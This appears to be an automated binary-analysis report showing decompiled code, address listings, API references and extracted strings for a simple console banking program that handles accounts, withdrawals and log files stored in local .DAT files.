                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 0xa);
                                                					_push("7. Log out");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 0xc);
                                                					_push("8. Exit");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t139 = _t131 + 0x20;
                                                					E012312B0(1, 0x11);
                                                					_v24 = 0;
                                                					while(1) {
                                                						__eflags = _v24 - 0x4e;
                                                						if(__eflags >= 0) {
                                                							break;
                                                						}
                                                						_push("_");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						_t139 = _t139 + 4;
                                                						_t111 = _v24 + 1;
                                                						__eflags = _t111;
                                                						_v24 = _t111;
                                                					}
                                                					E012312B0(0x17, 0x13);
                                                					_push("Press a choice between the range [1-8] ");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t131 = _t139 + 4;
                                                					_v16 = 0x30;
                                                					_v16 = _v16 - 1;
                                                					__eflags = _v16 - 7;
                                                					if(__eflags > 0) {
                                                						E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                						E012312B0(0xa, 0xa);
                                                						_push("Your input is out of range! Enter a choice between 1 to 8!");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						E012312B0(0xf, 0xc);
                                                						_push("Press any key to return to main menu...");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						_t131 = _t131 + 8;
                                                					} else {
                                                						switch( *((intOrPtr*)(_v16 * 4 +  &M01233A88))) {
                                                							case 0:
                                                								E01233DE0(_t108, _t111, _t121, _t122, __eflags, _t148);
                                                								goto L35;
                                                							case 1:
                                                								__eax = E01234640(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 2:
                                                								__eax = E012349E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 3:
                                                								__eax = E01234E90(__ebx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 4:
                                                								__eax = E01235600(__ebx, __ecx, __eflags, __fp0);
                                                								goto L35;
                                                							case 5:
                                                								__eax = E01236190(__ebx, __ecx, __edx, __fp0);
                                                								goto L35;
                                                							case 6:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0) = E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to Log out? <Y/N> : ");
                                                								__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__ecx = _v5;
                                                								__eflags = __ecx - 0x59;
                                                								if(__eflags == 0) {
                                                									L28:
                                                									_t40 =  &_v36; // -15
                                                									_t40 = E01238417(__eflags, _t40);
                                                									 *0x1252f28 = E01236EF1("LOG.DAT", "a");
                                                									_t41 =  &_v36; // -15
                                                									__ecx = _t41;
                                                									_push(_t41);
                                                									_t42 =  &_v80; // -59
                                                									__edx = _t42;
                                                									_push(_t42);
                                                									_push(0x1252f40);
                                                									_push(0x1252ee0);
                                                									_push("%s %s %s %s\n");
                                                									__eax =  *0x1252f28; // 0x0
                                                									_push(__eax);
                                                									__eax = E01236F06(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 0x18;
                                                									__ecx =  *0x1252f28; // 0x0
                                                									_push(__ecx);
                                                									__eax = E01236DB6(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 4;
                                                									__eax = E01233610(__ebx, __edi, __esi, __fp0);
                                                								} else {
                                                									__edx = _v5;
                                                									__eflags = _v5 - 0x79;
                                                									if(__eflags == 0) {
                                                										goto L28;
                                                									}
                                                								}
                                                								goto L35;
                                                							case 7:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0) = E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to exit? <Y/N> : ");
                                                								__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__edx = _v5;
                                                								__eflags = _v5 - 0x59;
                                                								if(__eflags == 0) {
                                                									L32:
                                                									_t45 =  &_v36; // -15
                                                									__ecx = _t45;
                                                									__eax = E01238417(__eflags, _t45);
                                                									 *0x1252f28 = E01236EF1("LOG.DAT", "a");
                                                									_t46 =  &_v36; // -15
                                                									__edx = _t46;
                                                									_push(_t46);
                                                									_t47 =  &_v80; // -59
                                                									__eax = _t47;
                                                									_push(_t47);
                                                									_push(0x1252f40);
                                                									_push(0x1252ee0);
                                                									_push("%s %s %s %s\n");
                                                									__ecx =  *0x1252f28; // 0x0
                                                									_push(__ecx);
                                                									__eax = E01236F06(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 0x18;
                                                									__edx =  *0x1252f28; // 0x0
                                                									_push(__edx);
                                                									__eax = E01236DB6(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 4;
                                                									__eax = E012377B1(0);
                                                								} else {
                                                									__eax = _v5;
                                                									__eflags = _v5 - 0x79;
                                                									if(__eflags == 0) {
                                                										goto L32;
                                                									}
                                                								}
                                                								goto L35;
                                                						}
                                                					}
                                                					L35:
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				return 1;
                                                			}








































                                                0x01233610
                                                0x01233610
                                                0x01233610
                                                0x01233610
                                                0x01233619
                                                0x0123361f
                                                0x01233622
                                                0x01233625
                                                0x01233628
                                                0x0123362b
                                                0x0123362e
                                                0x01233631
                                                0x01233634
                                                0x01233637
                                                0x0123363e
                                                0x01233645
                                                0x0123364c
                                                0x01233654
                                                0x0123365d
                                                0x01233662
                                                0x01233667
                                                0x01233673
                                                0x01233678
                                                0x0123367d
                                                0x0123368f
                                                0x0123369b
                                                0x012336a0
                                                0x012336a5
                                                0x012336aa
                                                0x012336b1
                                                0x012336bc
                                                0x012336bf
                                                0x012336c3
                                                0x012336c5
                                                0x012336ce
                                                0x012336d3
                                                0x012336d8
                                                0x012336e4
                                                0x012336e9
                                                0x012336ee
                                                0x012336f3
                                                0x012336f8
                                                0x012336f8
                                                0x012336fd
                                                0x0123370e
                                                0x01233713
                                                0x01233716
                                                0x0123371b
                                                0x01233721
                                                0x01233725
                                                0x0123372f
                                                0x01233735
                                                0x0123373a
                                                0x01233740
                                                0x00000000
                                                0x00000000
                                                0x0123374b
                                                0x01233750
                                                0x01233755
                                                0x01233763
                                                0x01233768
                                                0x0123376d
                                                0x01233775
                                                0x01233775
                                                0x0123376d
                                                0x01233778
                                                0x0123377a
                                                0x01233780
                                                0x01233781
                                                0x01233786
                                                0x01233789
                                                0x0123378e
                                                0x01233792
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01233794
                                                0x01233798
                                                0x0123379d
                                                0x012337a2
                                                0x012337a7
                                                0x012337b3
                                                0x012337b3
                                                0x012337bf
                                                0x012337c4
                                                0x012337c7
                                                0x012337cc
                                                0x012337cc
                                                0x012337d5
                                                0x012337da
                                                0x012337df
                                                0x012337eb
                                                0x012337f0
                                                0x012337f5
                                                0x01233801
                                                0x01233806
                                                0x0123380b
                                                0x01233817
                                                0x0123381c
                                                0x01233821
                                                0x0123382d
                                                0x01233832
                                                0x01233837
                                                0x01233843
                                                0x01233848
                                                0x0123384d
                                                0x01233859
                                                0x0123385e
                                                0x01233863
                                                0x0123386f
                                                0x01233874
                                                0x01233879
                                                0x0123387e
                                                0x01233885
                                                0x0123388a
                                                0x0123389c
                                                0x0123389c
                                                0x012338a0
                                                0x00000000
                                                0x00000000
                                                0x012338a2
                                                0x012338a7
                                                0x012338ac
                                                0x01233896
                                                0x01233896
                                                0x01233899
                                                0x01233899
                                                0x012338b5
                                                0x012338ba
                                                0x012338bf
                                                0x012338c4
                                                0x012338c7
                                                0x012338d4
                                                0x012338d7
                                                0x012338db
                                                0x01233a43
                                                0x01233a4c
                                                0x01233a51
                                                0x01233a56
                                                0x01233a62
                                                0x01233a67
                                                0x01233a6c
                                                0x01233a71
                                                0x012338e1
                                                0x012338e4
                                                0x00000000
                                                0x012338eb
                                                0x00000000
                                                0x00000000
                                                0x012338f5
                                                0x00000000
                                                0x00000000
                                                0x012338ff
                                                0x00000000
                                                0x00000000
                                                0x01233909
                                                0x00000000
                                                0x00000000
                                                0x01233913
                                                0x00000000
                                                0x00000000
                                                0x0123391d
                                                0x00000000
                                                0x00000000
                                                0x01233930
                                                0x01233935
                                                0x0123393a
                                                0x0123393f
                                                0x01233942
                                                0x01233946
                                                0x01233949
                                                0x01233954
                                                0x01233954
                                                0x01233958
                                                0x01233972
                                                0x01233977
                                                0x01233977
                                                0x0123397a
                                                0x0123397b
                                                0x0123397b
                                                0x0123397e
                                                0x0123397f
                                                0x01233984
                                                0x01233989
                                                0x0123398e
                                                0x01233993
                                                0x01233994
                                                0x01233999
                                                0x0123399c
                                                0x012339a2
                                                0x012339a3
                                                0x012339a8
                                                0x012339ab
                                                0x0123394b
                                                0x0123394b
                                                0x0123394f
                                                0x01233952
                                                0x00000000
                                                0x00000000
                                                0x01233952
                                                0x00000000
                                                0x00000000
                                                0x012339be
                                                0x012339c3
                                                0x012339c8
                                                0x012339cd
                                                0x012339d0
                                                0x012339d4
                                                0x012339d7
                                                0x012339e2
                                                0x012339e2
                                                0x012339e2
                                                0x012339e6
                                                0x01233a00
                                                0x01233a05
                                                0x01233a05
                                                0x01233a08
                                                0x01233a09
                                                0x01233a09
                                                0x01233a0c
                                                0x01233a0d
                                                0x01233a12
                                                0x01233a17
                                                0x01233a1c
                                                0x01233a22
                                                0x01233a23
                                                0x01233a28
                                                0x01233a2b
                                                0x01233a31
                                                0x01233a32
                                                0x01233a37
                                                0x01233a3c
                                                0x012339d9
                                                0x012339d9
                                                0x012339dd
                                                0x012339e0
                                                0x00000000
                                                0x00000000
                                                0x012339e0
                                                0x00000000
                                                0x00000000
                                                0x012338e4
                                                0x01233a74
                                                0x01233a79
                                                0x01233a79
                                                0x01233a84

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01233667
                                                • _wprintf.LIBCMT ref: 0123367D
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wscanf.LIBCMT ref: 0123368F
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 012336A5
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                • _wprintf.LIBCMT ref: 012336D8
                                                • _wprintf.LIBCMT ref: 01233863
                                                • _wprintf.LIBCMT ref: 01233879
                                                • _wprintf.LIBCMT ref: 012338A7
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E21
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E54
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E6C
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233E80
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233E94
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233EAA
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233EBB
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233ED1
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233EE2
                                                • _wprintf.LIBCMT ref: 012338BF
                                                • _wprintf.LIBCMT ref: 012336EE
                                                  • Part of subcall function 012377B1: _doexit.LIBCMT ref: 012377BB
                                                • _swscanf.LIBCMT ref: 01233735
                                                • _wprintf.LIBCMT ref: 012337A2
                                                • __wstrtime.LIBCMT ref: 012337BF
                                                • _wprintf.LIBCMT ref: 012337DF
                                                • _wprintf.LIBCMT ref: 012337F5
                                                • _wprintf.LIBCMT ref: 0123380B
                                                • _wprintf.LIBCMT ref: 01233821
                                                • _wprintf.LIBCMT ref: 01233837
                                                • _wprintf.LIBCMT ref: 0123384D
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                • String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
                                                • API String ID: 1611355571-1720101819
                                                • Opcode ID: 7d4ece58a05335a514650151b2cc820101cead5f33927ff34e9b8fa5ad783810
                                                • Instruction ID: c97e78d35ff57704f51b266a57c2891e41bfbc009934773b4c93d9347c0e3cb9
                                                • Opcode Fuzzy Hash: 7d4ece58a05335a514650151b2cc820101cead5f33927ff34e9b8fa5ad783810
                                                • Instruction Fuzzy Hash: 4FA1B4F2EB4307ABEB15FBE49D43BBE76606BE1B10F004128E945752C0E9B1A2584767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 43%
                                                			E012349E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				char _v5;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v42;
                                                				char _v62;
                                                				char _v112;
                                                				char _v113;
                                                				char _v125;
                                                				char _v140;
                                                				char _v170;
                                                				char _v200;
                                                				char _v208;
                                                				char _v244;
                                                				char _v324;
                                                				char _v376;
                                                				char _v456;
                                                				void* __ebp;
                                                				intOrPtr _t64;
                                                				intOrPtr _t70;
                                                				intOrPtr _t75;
                                                				void* _t76;
                                                				intOrPtr _t77;
                                                				void* _t81;
                                                				char _t97;
                                                				intOrPtr _t99;
                                                				void* _t104;
                                                				intOrPtr _t105;
                                                				intOrPtr _t110;
                                                				void* _t117;
                                                				void* _t122;
                                                				void* _t127;
                                                				intOrPtr _t147;
                                                				intOrPtr _t148;
                                                				intOrPtr _t168;
                                                				intOrPtr _t173;
                                                				void* _t177;
                                                				void* _t180;
                                                				void* _t184;
                                                				void* _t185;
                                                				void* _t193;
                                                				void* _t195;
                                                				void* _t196;
                                                				void* _t205;
                                                
                                                				_t215 = __fp0;
                                                				_t176 = __esi;
                                                				_t175 = __edi;
                                                				_t132 = __ecx;
                                                				_t131 = __ebx;
                                                				_v16 = 0;
                                                				E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                				E012312B0(5, 0xa);
                                                				_push("Withdraw from A/C number          : ");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E0123738B("%s",  &_v28);
                                                				_t64 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t180 = _t177 + 0x14;
                                                				 *0x1252f28 = _t64;
                                                				_t214 = _v16;
                                                				if(_v16 == 0) {
                                                					E012320E0(_t132, __edi, __esi, _t214, __fp0);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Given A/C number does not exits!");
                                                					return E0123715C(__ebx, _t175, _t176, _t214);
                                                				}
                                                				E012312B0(0x32, 0xa);
                                                				_push( &_v376);
                                                				_push("[ %s ]");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E012312B0(5, 0xc);
                                                				_push("Amount to be Withdrawn (in NRs.)  : ");
                                                				E0123715C(__ebx, _t175, _t176, __eflags);
                                                				E0123738B("%f",  &_v12);
                                                				_t70 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t184 = _t180 + 0x1c;
                                                				 *0x1252f28 = _t70;
                                                				_v16 = 0;
                                                				while(1) {
                                                					_push( &_v32);
                                                					_push( &_v36);
                                                					_push( &_v40);
                                                					_push( &_v42);
                                                					_push( &_v140);
                                                					_push( &_v113);
                                                					_push( &_v62);
                                                					_push( &_v112);
                                                					_push( &_v125);
                                                					_push( &_v170);
                                                					_push( &_v200);
                                                					_t75 =  *0x1252f28; // 0x0
                                                					_t76 = E01237021(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                					_t185 = _t184 + 0x38;
                                                					__eflags = _t76 - 0xffffffff;
                                                					if(__eflags == 0) {
                                                						break;
                                                					}
                                                					_t122 = E01238230( &_v208,  &_v28);
                                                					_t184 = _t185 + 8;
                                                					__eflags = _t122;
                                                					if(__eflags == 0) {
                                                						asm("movss xmm0, [ebp-0x8]");
                                                						asm("comiss xmm0, [ebp-0x1c]");
                                                						if(__eflags > 0) {
                                                							E012320E0( &_v28, _t175, _t176, __eflags, _t215);
                                                							E012312B0(0x14, 0xc);
                                                							asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                							asm("movsd [esp], xmm0");
                                                							_push("Sorry, the current balance is Rs. %.2f only!");
                                                							E0123715C(_t131, _t175, _t176, __eflags);
                                                							E012312B0(0x19, 0xe);
                                                							_push("Transaction NOT completed!");
                                                							_t127 = E0123715C(_t131, _t175, _t176, __eflags);
                                                							_v16 = 1;
                                                							return _t127;
                                                						}
                                                					}
                                                				}
                                                				_t77 =  *0x1252f28; // 0x0
                                                				_push(_t77);
                                                				E01236DB6(_t131, _t175, _t176, __eflags);
                                                				E012320E0( &_v200, _t175, _t176, __eflags, _t215);
                                                				E012312B0(0x1e, 0xa);
                                                				_push("Confirm Transaction");
                                                				_t81 = E0123715C(_t131, _t175, _t176, __eflags);
                                                				asm("movss xmm0, [ebp-0x8]");
                                                				asm("movss [esp], xmm0");
                                                				E01231870(_t81,  &_v244);
                                                				E012312B0(3, 0xc);
                                                				_push( &_v376);
                                                				_push( &_v28);
                                                				E0123715C(_t131, _t175, _t176, __eflags);
                                                				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                				asm("movsd [esp], xmm0");
                                                				E01231B30( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
                                                				E01238140( &_v324,  &_v456);
                                                				E01238140( &_v324, "]");
                                                				E012312B0(0x28 - (E012382C0( &_v324) >> 1), 0xe);
                                                				_push( &_v324);
                                                				E01237229(_t131, _t175, _t176, __eflags);
                                                				E012312B0(8, 0x11);
                                                				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                				E0123715C(_t131, _t175, _t176, __eflags);
                                                				_t193 = _t185 + 0x14 - 8 + 0x1c;
                                                				_t97 = _v5;
                                                				__eflags = _t97 - 0x59;
                                                				if(_t97 == 0x59) {
                                                					L10:
                                                					 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                					_t99 = E01236EF1("TEMP.DAT", "w");
                                                					_t195 = _t193 + 0x10;
                                                					 *0x1252f24 = _t99;
                                                					_v16 = 0;
                                                					while(1) {
                                                						_push( &_v32);
                                                						_push( &_v36);
                                                						_push( &_v40);
                                                						_push( &_v42);
                                                						_push( &_v140);
                                                						_push( &_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_t168 =  *0x1252f28; // 0x0
                                                						_t104 = E01237021(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                						_t196 = _t195 + 0x38;
                                                						__eflags = _t104 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							break;
                                                						}
                                                						_t117 = E01238230( &_v208,  &_v28);
                                                						_t205 = _t196 + 8;
                                                						__eflags = _t117;
                                                						if(__eflags == 0) {
                                                							asm("movss xmm0, [ebp-0x24]");
                                                							asm("subss xmm0, [ebp-0x8]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [0x1248210]");
                                                						asm("comiss xmm0, [ebp-0x24]");
                                                						if(__eflags > 0) {
                                                							asm("movss xmm0, [ebp-0x20]");
                                                							asm("addss xmm0, [ebp-0x24]");
                                                							asm("movss [ebp-0x20], xmm0");
                                                							asm("movss xmm0, [0x1248210]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [ebp-0x24]");
                                                						asm("addss xmm0, [ebp-0x20]");
                                                						asm("movss [ebp-0x1c], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                						asm("movsd [esp], xmm0");
                                                						_push(_v42);
                                                						_push( &_v140);
                                                						_push(_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_push( &_v208);
                                                						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                						_t173 =  *0x1252f24; // 0x0
                                                						_push(_t173);
                                                						E01236F06(_t131, _t175, _t176, __eflags);
                                                						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
                                                					}
                                                					_t105 =  *0x1252f24; // 0x0
                                                					_push(_t105);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					_t147 =  *0x1252f28; // 0x0
                                                					_push(_t147);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					 *0x1252f28 = E01236EF1("TRANSACTION.DAT", "a");
                                                					E01238417(__eflags, 0x1252f30);
                                                					_push(0x1252ee4);
                                                					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                					asm("movsd [esp], xmm0");
                                                					_push(0x1252f30);
                                                					_push(0x1252f40);
                                                					_push("Cash+Withdrawn");
                                                					_push( &_v28);
                                                					_push("%s %s %s %s %.2f %s\n");
                                                					_t110 =  *0x1252f28; // 0x0
                                                					_push(_t110);
                                                					E01236F06(_t131, _t175, _t176, __eflags);
                                                					_t148 =  *0x1252f28; // 0x0
                                                					_push(_t148);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					E012320E0(_t148, _t175, _t176, __eflags, _t215);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Transaction completed successfully!");
                                                					return E0123715C(_t131, _t175, _t176, __eflags);
                                                				}
                                                				__eflags = _v5 - 0x79;
                                                				if(_v5 == 0x79) {
                                                					goto L10;
                                                				}
                                                				return _t97;
                                                			}


















































                                                0x012349e0
                                                0x012349e0
                                                0x012349e0
                                                0x012349e0
                                                0x012349e0
                                                0x012349e9
                                                0x012349f0
                                                0x012349f9
                                                0x012349fe
                                                0x01234a03
                                                0x01234a14
                                                0x01234a26
                                                0x01234a2b
                                                0x01234a2e
                                                0x01234a33
                                                0x01234a37
                                                0x01234a39
                                                0x01234a42
                                                0x01234a47
                                                0x00000000
                                                0x01234a51
                                                0x01234a5d
                                                0x01234a68
                                                0x01234a69
                                                0x01234a6e
                                                0x01234a7a
                                                0x01234a7f
                                                0x01234a84
                                                0x01234a95
                                                0x01234aa7
                                                0x01234aac
                                                0x01234aaf
                                                0x01234ab4
                                                0x01234abb
                                                0x01234abe
                                                0x01234ac2
                                                0x01234ac6
                                                0x01234aca
                                                0x01234ad1
                                                0x01234ad5
                                                0x01234ad9
                                                0x01234add
                                                0x01234ae1
                                                0x01234ae8
                                                0x01234aef
                                                0x01234afc
                                                0x01234b02
                                                0x01234b07
                                                0x01234b0a
                                                0x01234b0d
                                                0x00000000
                                                0x00000000
                                                0x01234b1a
                                                0x01234b1f
                                                0x01234b22
                                                0x01234b24
                                                0x01234b26
                                                0x01234b2b
                                                0x01234b2f
                                                0x01234b31
                                                0x01234b3a
                                                0x01234b3f
                                                0x01234b47
                                                0x01234b4c
                                                0x01234b51
                                                0x01234b5d
                                                0x01234b62
                                                0x01234b67
                                                0x01234b6f
                                                0x00000000
                                                0x01234b6f
                                                0x01234b2f
                                                0x01234b7b
                                                0x01234b80
                                                0x01234b85
                                                0x01234b86
                                                0x01234b8e
                                                0x01234b97
                                                0x01234b9c
                                                0x01234ba1
                                                0x01234ba6
                                                0x01234bab
                                                0x01234bb7
                                                0x01234bc0
                                                0x01234bcb
                                                0x01234bcf
                                                0x01234bdc
                                                0x01234beb
                                                0x01234bf3
                                                0x01234bf8
                                                0x01234c0b
                                                0x01234c1f
                                                0x01234c42
                                                0x01234c4d
                                                0x01234c4e
                                                0x01234c5a
                                                0x01234c5f
                                                0x01234c64
                                                0x01234c69
                                                0x01234c6c
                                                0x01234c70
                                                0x01234c73
                                                0x01234c82
                                                0x01234c94
                                                0x01234ca3
                                                0x01234ca8
                                                0x01234cab
                                                0x01234cb0
                                                0x01234cb7
                                                0x01234cba
                                                0x01234cbe
                                                0x01234cc2
                                                0x01234cc6
                                                0x01234ccd
                                                0x01234cd1
                                                0x01234cd5
                                                0x01234cd9
                                                0x01234cdd
                                                0x01234ce4
                                                0x01234ceb
                                                0x01234cf8
                                                0x01234cff
                                                0x01234d04
                                                0x01234d07
                                                0x01234d0a
                                                0x00000000
                                                0x00000000
                                                0x01234d1b
                                                0x01234d20
                                                0x01234d23
                                                0x01234d25
                                                0x01234d27
                                                0x01234d2c
                                                0x01234d31
                                                0x01234d31
                                                0x01234d36
                                                0x01234d3e
                                                0x01234d42
                                                0x01234d44
                                                0x01234d49
                                                0x01234d4e
                                                0x01234d53
                                                0x01234d5b
                                                0x01234d5b
                                                0x01234d60
                                                0x01234d65
                                                0x01234d6a
                                                0x01234d6f
                                                0x01234d77
                                                0x01234d7c
                                                0x01234d84
                                                0x01234d89
                                                0x01234d91
                                                0x01234d9a
                                                0x01234da1
                                                0x01234da6
                                                0x01234daa
                                                0x01234dae
                                                0x01234db2
                                                0x01234db9
                                                0x01234dc0
                                                0x01234dc7
                                                0x01234dc8
                                                0x01234dcd
                                                0x01234dd3
                                                0x01234dd4
                                                0x01234dd9
                                                0x01234dd9
                                                0x01234de1
                                                0x01234de6
                                                0x01234de7
                                                0x01234def
                                                0x01234df5
                                                0x01234df6
                                                0x01234e10
                                                0x01234e1a
                                                0x01234e22
                                                0x01234e27
                                                0x01234e2f
                                                0x01234e34
                                                0x01234e39
                                                0x01234e3e
                                                0x01234e46
                                                0x01234e47
                                                0x01234e4c
                                                0x01234e51
                                                0x01234e52
                                                0x01234e5a
                                                0x01234e60
                                                0x01234e61
                                                0x01234e69
                                                0x01234e72
                                                0x01234e77
                                                0x00000000
                                                0x01234e81
                                                0x01234c79
                                                0x01234c7c
                                                0x00000000
                                                0x00000000
                                                0x01234e87

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01234A03
                                                • _wscanf.LIBCMT ref: 01234A14
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _wprintf.LIBCMT ref: 01234A4C
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 01234A6E
                                                • _wprintf.LIBCMT ref: 01234A84
                                                • _wscanf.LIBCMT ref: 01234A95
